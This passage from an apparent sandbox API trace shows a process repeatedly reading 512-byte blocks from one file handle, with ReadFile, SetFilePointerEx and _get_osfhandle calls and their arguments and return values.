nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, 
